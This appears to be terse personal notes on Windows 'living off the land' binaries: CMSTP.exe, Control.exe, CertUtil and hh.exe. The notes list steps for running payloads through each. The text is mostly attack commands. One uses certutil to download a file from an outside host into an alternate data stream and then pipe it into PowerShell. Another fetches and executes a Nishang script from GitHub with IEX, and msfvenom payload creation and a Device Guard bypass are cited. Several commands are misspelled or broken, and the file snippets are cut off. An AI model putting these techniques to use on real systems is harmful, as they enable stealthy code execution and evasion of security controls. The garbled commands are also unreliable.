Lol Bins
Living Off the Lands
CMSTP.exe
- payload cacl.sct
1 | <?XML version="1.0"?> |
- stager cmstp.inf
1 | [version] |
- run
1
cmstp.exe /ni s cmstp.inf
Control.exe
- create dll with msfvenom or custom
- create Alternate Data Stream (ADS)
1 | C:\Users\IEUser\Documents>echo "demo" > C:\demo\test.txt |
- execute with control.exe
reference
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-1/
CertUtil
- function of the command
- download , encode ,decode
- download payload and write in data stream
1 | certuil -urlcache -sploit -f http://192.168.1.210/certuil.txt C:\demo\test2.txt:certutil |
- payload is simple powershell command
1 | start-process calc.exe |
- execute
1 | powershell < C:\demo\test2.txt:certuil |
hh.exe
- create help file with the script from nishang
1 | PS C:\Users\IEUser> IEX((iwr "https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1") |
- execute with hh.exe
reference https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/